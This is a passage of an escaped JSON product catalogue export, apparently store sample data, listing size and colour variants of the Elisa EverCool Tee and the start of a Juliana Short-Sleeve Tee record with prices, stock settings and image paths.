se_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws06-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws06-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"1407\":{\"sku\":\"WS06-L-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Elisa EverCool&trade; Tee-L-Gray\",\"description\":\"<p>When rising temps threaten to melt you down, Elisa EverCool&trade; Tee brings serious relief. Moisture-wicking fabric pulls sweat away from your skin, while the innovative seams hug your muscles to enhance your range of motion.<\\/p>\\n<p>&bull; Purple heather v-neck tee.<br \\/>&bull; Short-Sleeves.<br \\/>&bull; Luma EverCool&trade; fabric. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"elisa-evercool-trade-tee-l-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws06-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws06-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws06-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws06-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws06-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Gray\"},\"1408\":{\"sku\":\"WS06-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Elisa EverCool&trade; Tee-L-Purple\",\"description\":\"<p>When rising temps threaten to melt you down, Elisa EverCool&trade; Tee brings serious relief. Moisture-wicking fabric pulls sweat away from your skin, while the innovative seams hug your muscles to enhance your range of motion.<\\/p>\\n<p>&bull; Purple heather v-neck tee.<br \\/>&bull; Short-Sleeves.<br \\/>&bull; Luma EverCool&trade; fabric. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"elisa-evercool-trade-tee-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws06-purple_back.jpg\",\"image\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws06-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},\"1409\":{\"sku\":\"WS06-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Elisa EverCool&trade; Tee-L-Red\",\"description\":\"<p>When rising temps threaten to melt you down, Elisa EverCool&trade; Tee brings serious relief. Moisture-wicking fabric pulls sweat away from your skin, while the innovative seams hug your muscles to enhance your range of motion.<\\/p>\\n<p>&bull; Purple heather v-neck tee.<br \\/>&bull; Short-Sleeves.<br \\/>&bull; Luma EverCool&trade; fabric. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"elisa-evercool-trade-tee-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws06-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws06-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws06-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws06-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws06-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"1410\":{\"sku\":\"WS06-XL-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Elisa EverCool&trade; Tee-XL-Gray\",\"description\":\"<p>When rising temps threaten to melt you down, Elisa EverCool&trade; Tee brings serious relief. Moisture-wicking fabric pulls sweat away from your skin, while the innovative seams hug your muscles to enhance your range of motion.<\\/p>\\n<p>&bull; Purple heather v-neck tee.<br \\/>&bull; Short-Sleeves.<br \\/>&bull; Luma EverCool&trade; fabric. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"elisa-evercool-trade-tee-xl-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws06-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws06-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws06-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws06-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws06-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Gray\"},\"1411\":{\"sku\":\"WS06-XL-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Elisa EverCool&trade; Tee-XL-Purple\",\"description\":\"<p>When rising temps threaten to melt you down, Elisa EverCool&trade; Tee brings serious relief. Moisture-wicking fabric pulls sweat away from your skin, while the innovative seams hug your muscles to enhance your range of motion.<\\/p>\\n<p>&bull; Purple heather v-neck tee.<br \\/>&bull; Short-Sleeves.<br \\/>&bull; Luma EverCool&trade; fabric. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"elisa-evercool-trade-tee-xl-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws06-purple_back.jpg\",\"image\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws06-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Purple\"},\"1412\":{\"sku\":\"WS06-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Elisa EverCool&trade; Tee-XL-Red\",\"description\":\"<p>When rising temps threaten to melt you down, Elisa EverCool&trade; Tee brings serious relief. Moisture-wicking fabric pulls sweat away from your skin, while the innovative seams hug your muscles to enhance your range of motion.<\\/p>\\n<p>&bull; Purple heather v-neck tee.<br \\/>&bull; Short-Sleeves.<br \\/>&bull; Luma EverCool&trade; fabric. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"elisa-evercool-trade-tee-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws06-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws06-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws06-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws06-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws06-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"1413\":{\"sku\":\"WS06\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Elisa EverCool&trade; Tee\",\"description\":\"<p>When rising temps threaten to melt you down, Elisa EverCool&trade; Tee brings serious relief. Moisture-wicking fabric pulls sweat away from your skin, while the innovative seams hug your muscles to enhance your range of motion.<\\/p>\\n<p>&bull; Purple heather v-neck tee.<br \\/>&bull; Short-Sleeves.<br \\/>&bull; Luma EverCool&trade; fabric. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tee,material=EverCool&trade;|Organic Cotton,pattern=Solid,climate=Indoor|Warm,eco_collection=Yes,performance_fabric=No,erin_recommends=No,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WS06-XS-Gray,size=XS,color=Gray|sku=WS06-XS-Purple,size=XS,color=Purple|sku=WS06-XS-Red,size=XS,color=Red|sku=WS06-S-Gray,size=S,color=Gray|sku=WS06-S-Purple,size=S,color=Purple|sku=WS06-S-Red,size=S,color=Red|sku=WS06-M-Gray,size=M,color=Gray|sku=WS06-M-Purple,size=M,color=Purple|sku=WS06-M-Red,size=M,color=Red|sku=WS06-L-Gray,size=L,color=Gray|sku=WS06-L-Purple,size=L,color=Purple|sku=WS06-L-Red,size=L,color=Red|sku=WS06-XL-Gray,size=XL,color=Gray|sku=WS06-XL-Purple,size=XL,color=Purple|sku=WS06-XL-Red,size=XL,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws06-purple_back.jpg\",\"image\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws06-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tee\",\"material\":\"EverCool&trade;|Organic Cotton\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Warm\",\"eco_collection\":\"Yes\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"Yes\",\"sale\":\"No\"},\"1414\":{\"sku\":\"WS07-XS-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Juliana Short-Sleeve Tee-XS-Black\",\"description\":\"<p>The Juliana Short-Sleeve Tee gives you more than sporty style. Consider that its soft Cocona&reg; polyester fabric accelerates evaporation to help keep you dry and comfortable, too. And a selection of colors lets you get more than one.<\\/p>\\n<p>&bull; Black scoop neck tee.<br \\/>&bull; Side rouching.<br \\/>&bull; Relaxed fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juliana-short-sleeve-tee-xs-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws07-black_alt1.jpg,\\/w\\/s\\/ws07-black_back.jpg\",\"image\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws07-black_alt1.jpg,\\/w\\/s\\/ws07-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"